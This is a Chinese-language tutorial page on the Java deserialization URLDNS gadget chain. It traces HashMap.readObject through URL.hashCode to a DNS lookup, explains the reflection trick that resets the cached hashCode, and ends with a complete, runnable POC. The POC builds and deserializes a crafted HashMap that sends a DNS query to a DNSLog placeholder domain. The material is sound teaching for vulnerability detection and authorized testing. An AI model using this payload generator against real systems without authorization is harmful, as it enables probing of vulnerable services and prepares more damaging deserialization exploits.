Java反序列化漏洞利用链：URLDNS链深度剖析教学文档<\/h2>

1. 概述<\/h3>

URLDNS链<\/strong>是Java反序列化漏洞中一个非常经典且常用的利用链。它并非用于直接执行代码，而是作为一个**“验证型”的POC（概念证明）。其主要作用是<\/strong>验证目标应用是否存在Java反序列化漏洞**，通过触发一次DNS查询请求来确认漏洞存在。<\/p>

核心价值<\/strong>：<\/p>

可靠性高<\/strong>：该链仅依赖于Java核心库中的类（HashMap<\/code>、URL<\/code>），存在于绝大多数Java环境中，兼容性极佳。<\/li>
无害探测<\/strong>：不执行任何恶意代码，仅产生DNS查询记录，对目标服务影响小，适合在授权测试中使用。<\/li> <\/ul> 2. 利用链核心构成（Gadget Chain）<\/h3> 整个利用链的调用过程非常简洁，始于反序列化入口点readObject<\/code>，终于DNS查询。<\/p> HashMap.readObject() -> HashMap.putVal() -> HashMap.hash() -> URL.hashCode() -> URLStreamHandler.hashCode() -> URLStreamHandler.getHostAddress() -> InetAddress.getByName() [触发DNS查询] <\/code><\/pre> 3. 关键知识点深度解析<\/h3> 3.1 为何选择HashMap作为入口？<\/h4> 在Java反序列化过程中，反序列化器会调用对象的readObject()<\/code>方法来完成对象的重建。java.util.HashMap<\/code>类重写了readObject<\/code>方法。在其反序列化逻辑中，有一个关键操作：它会读取序列化数据中存储的所有键值对（key-value pairs），并为了重建哈希表，会重新计算每个键（Key）的哈希值（Hash Code）<\/strong>。<\/p> \/\/ 在HashMap.readObject(ObjectInputStream s)方法中的关键循环 <\/span><\/span><\/span><\/span>for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> mappings;<\/span> i++)<\/span> {<\/span> <\/span><\/span> K key =<\/span> (<\/span>K)<\/span> s.<\/span>readObject<\/span>();<\/span> \/\/ 反序列化出Key对象 <\/span><\/span><\/span><\/span> V value =<\/span> (<\/span>V)<\/span> s.<\/span>readObject<\/span>();<\/span> \/\/ 反序列化出Value对象 <\/span><\/span><\/span><\/span> putVal(<\/span>hash(<\/span>key),<\/span> key,<\/span> value,<\/span> false<\/span>,<\/span> false<\/span>);<\/span> \/\/ 重新计算哈希并放入表 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>结论<\/strong>：如果我们能让一个HashMap<\/code>的Key<\/code>是一个特殊的对象，并且在计算该对象的哈希值时能触发DNS请求，那么当这个HashMap<\/code>被反序列化时，DNS请求就会被触发。<\/p> 3.2 URL对象如何触发DNS请求？<\/h4> 逻辑链条的终点落在java.net.URL<\/code>类上。关键在于其hashCode()<\/code>方法。<\/p> \/\/ URL类的hashCode方法 <\/span><\/span><\/span><\/span>public<\/span> synchronized<\/span> int<\/span> hashCode<\/span>()<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>hashCode !=<\/span> -<\/span>1<\/span>)<\/span> <\/span><\/span> return<\/span> hashCode;<\/span> \/\/ 如果已经计算过哈希，直接返回缓存值 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 如果是第一次计算（或哈希值被重置为-1），则调用handler的hashCode方法 <\/span><\/span><\/span><\/span> hashCode =<\/span> handler.<\/span>hashCode<\/span>(<\/span>this<\/span>);<\/span> <\/span><\/span> return<\/span> hashCode;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> hashCode<\/code>变量是URL<\/code>类的一个私有成员（private int hashCode = -1;<\/code>），用于缓存计算过的哈希值，避免重复计算。<\/li> 当hashCode<\/code>等于-1<\/code>时，程序会执行handler.hashCode(this)<\/code>。<\/li> <\/ul> 接下来，我们看URLStreamHandler.hashCode(URL u)<\/code>方法：<\/p> protected<\/span> int<\/span> hashCode<\/span>(<\/span>URL u)<\/span> {<\/span> <\/span><\/span> int<\/span> h =<\/span> 0<\/span>;<\/span> <\/span><\/span> \/\/ ... 生成协议、端口等部分的哈希 ... <\/span><\/span><\/span><\/span> \/\/ 关键步骤：生成主机部分的哈希 <\/span><\/span><\/span><\/span> InetAddress addr =<\/span> getHostAddress(<\/span>u);<\/span> \/\/ 这行代码会触发DNS解析！ <\/span><\/span><\/span><\/span> if<\/span> (<\/span>addr !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> h +=<\/span> addr.<\/span>hashCode<\/span>();<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> String host =<\/span> u.<\/span>getHost<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>host !=<\/span> null<\/span>)<\/span> <\/span><\/span> h +=<\/span> host.<\/span>toLowerCase<\/span>().<\/span>hashCode<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... 生成其他部分的哈希 ... <\/span><\/span><\/span><\/span> return<\/span> h;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>getHostAddress(URL u)<\/code>方法会调用InetAddress.getByName(host)<\/code>来根据主机名获取IP地址，这个过程必然会产生DNS查询<\/strong>。<\/p> 结论<\/strong>：只要能让一个URL<\/code>对象的hashCode<\/code>方法被调用，并且其内部的hashCode<\/code>字段值为-1<\/code>，就会触发对其主机名的DNS解析。<\/p> 3.3 核心矛盾与解决方案：避免在序列化时触发DNS<\/h4> 这里出现了一个关键问题：如果我们简单地创建一个HashMap<\/code>并put<\/code>一个URL<\/code>对象，那么在put<\/code>操作时，HashMap<\/code>就会调用URL<\/code>的hashCode()<\/code>方法，DNS查询会立即在序列化阶段（即构造POC的阶段）发生<\/strong>，而不是在反序列化阶段。这不符合我们的目的。<\/p> 解决方案<\/strong>：利用Java反射机制，在put<\/code>操作前，临时修改URL<\/code>对象的hashCode<\/code>值。<\/p> 初始状态<\/strong>：URL<\/code>对象的hashCode<\/code>默认为-1<\/code>。<\/li> 序列化前干预<\/strong>：使用反射，将url<\/code>对象的hashCode<\/code>字段设置为一个非-1<\/code>的值（例如123<\/code>）。<\/li> 执行put操作<\/strong>：此时调用map.put(url, ...)<\/code>，HashMap<\/code>计算哈希hash(key)<\/code>时会调用url.hashCode()<\/code>。因为hashCode<\/code>不再是-1<\/code>，方法会直接返回123<\/code>，而不会执行handler.hashCode(this)<\/code>，因此不会触发DNS<\/strong>。<\/li> 恢复状态<\/strong>：在put<\/code>操作之后，再次使用反射将url<\/code>对象的hashCode<\/code>字段改回-1<\/code>。这样，在序列化时，URL<\/code>对象存储的hashCode<\/code>值就是-1<\/code>。<\/li> <\/ol> 3.4 反序列化时的完美触发<\/h4> 经过上述步骤，我们序列化了一个特殊的HashMap<\/code>：<\/p> 它的Key<\/code>是一个URL<\/code>对象。<\/li> 该URL<\/code>对象的hashCode<\/code>字段值为-1<\/code>。<\/li> URL<\/code>类中的handler<\/code>字段被transient<\/code>关键字修饰，意味着它不会被序列化<\/strong>。<\/li> <\/ul> 当这个HashMap<\/code>被反序列化时：<\/p> HashMap<\/code>的readObject<\/code>方法被调用。<\/li> 它读取到Key<\/code>（即URL<\/code>对象）。由于handler<\/code>字段是transient<\/code>的，反序列化后url.handler<\/code>为null<\/code>？这里是一个常见的误解点。实际上，URL<\/code>类有一个特殊的readObject<\/code>方法，它在反序列化时会调用getURLStreamHandler(protocol)<\/code>来根据协议（如http<\/code>）重新初始化handler<\/code>。所以，handler<\/code>在反序列化后是可用状态<\/strong>。<\/li> HashMap<\/code>为了重建内部结构，调用hash(key)<\/code>来计算URL<\/code>的哈希值。<\/li> 进入URL.hashCode()<\/code>方法，此时hashCode<\/code>字段的值是我们序列化时存储的-1<\/code>。<\/li> 程序执行handler.hashCode(this)<\/code>，进而调用getHostAddress(u)<\/code>，最终触发DNS查询。<\/li> <\/ol> 注意<\/strong>：正是因为我们在序列化阶段通过反射干预，避免了提前触发DNS，并保证了hashCode<\/code>在序列化时为-1<\/code>，才使得漏洞利用的触发点精准地发生在目标反序列化我们的输入流时<\/strong>。<\/p> 4. 完整POC代码与逐行分析<\/h3> import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span> <\/span><\/span>import<\/span> java.net.URL;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> URLDNS<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 1. 创建用于接收反序列化数据的HashMap <\/span><\/span><\/span><\/span> HashMap map =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> \/\/ 2. 指定一个DNSLog平台提供的域名，用于观察请求记录 <\/span><\/span><\/span><\/span> URL url =<\/span> new<\/span> URL(<\/span>"http:\/\/your-subdomain.dnslog.cn\/"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 3. 使用反射修改URL对象的hashCode，避免put时触发DNS <\/span><\/span><\/span><\/span> Class<?<\/span> extends<\/span> URL><\/span> clazz =<\/span> url.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Field hashCodeField =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"hashCode"<\/span>);<\/span> <\/span><\/span> hashCodeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> \/\/ 突破私有限制 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 4. 将hashCode设置为非-1的值（如123） <\/span><\/span><\/span><\/span> hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> 123<\/span>);<\/span> <\/span><\/span> \/\/ 5. 将URL作为Key放入HashMap。此时hashCode=123，不会触发DNS <\/span><\/span><\/span><\/span> map.<\/span>put<\/span>(<\/span>url,<\/span> "2333"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 6. 关键步骤：将hashCode改回-1，确保反序列化时能触发 <\/span><\/span><\/span><\/span> hashCodeField.<\/span>set<\/span>(<\/span>url,<\/span> -<\/span>1<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 7. 序列化操作：将构造好的HashMap写入文件 <\/span><\/span><\/span><\/span> try<\/span> (<\/span>FileOutputStream fileOut =<\/span> new<\/span> FileOutputStream(<\/span>".\/urldns.ser"<\/span>);<\/span> <\/span><\/span> ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>fileOut))<\/span> {<\/span> <\/span><\/span> out.<\/span>writeObject<\/span>(<\/span>map);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"序列化数据已写入 urldns.ser"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 8. 反序列化操作：模拟漏洞点读取恶意序列化数据 <\/span><\/span><\/span><\/span> try<\/span> (<\/span>FileInputStream fileIn =<\/span> new<\/span> FileInputStream(<\/span>".\/urldns.ser"<\/span>);<\/span> <\/span><\/span> ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>fileIn))<\/span> {<\/span> <\/span><\/span> \/\/ 这行代码会触发整个利用链，向DNSLog平台发送查询请求 <\/span><\/span><\/span><\/span> in.<\/span>readObject<\/span>();<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"反序列化完成，请检查DNSLog记录。"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5. 总结<\/h3> URLDNS链是一个理解Java反序列化漏洞的绝佳入门案例，它清晰地展示了以下重要原理：<\/p> 入口点寻找<\/strong>：寻找重写了readObject<\/code>方法且逻辑中存在“危险操作”的类（如HashMap<\/code>的重新哈希）。<\/li> 利用链构造<\/strong>：通过一系列的方法调用（Gadget Chain），将反序列化入口点与最终的危险函数（如网络请求、代码执行）连接起来。<\/li> 动态行为控制<\/strong>：利用反射等机制，精确控制对象在序列化和反序列化两个不同阶段的状态，确保漏洞利用在预期时刻触发。<\/li> 无害化验证<\/strong>：在渗透测试中，优先使用这种低破坏性的方式验证漏洞存在，再考虑进一步的利用。<\/li> <\/ol> 通过深入剖析URLDNS链，可以为学习更复杂、危害更大的反序列化利用链（如Commons Collections, Fastjson等）打下坚实的基础。<\/p>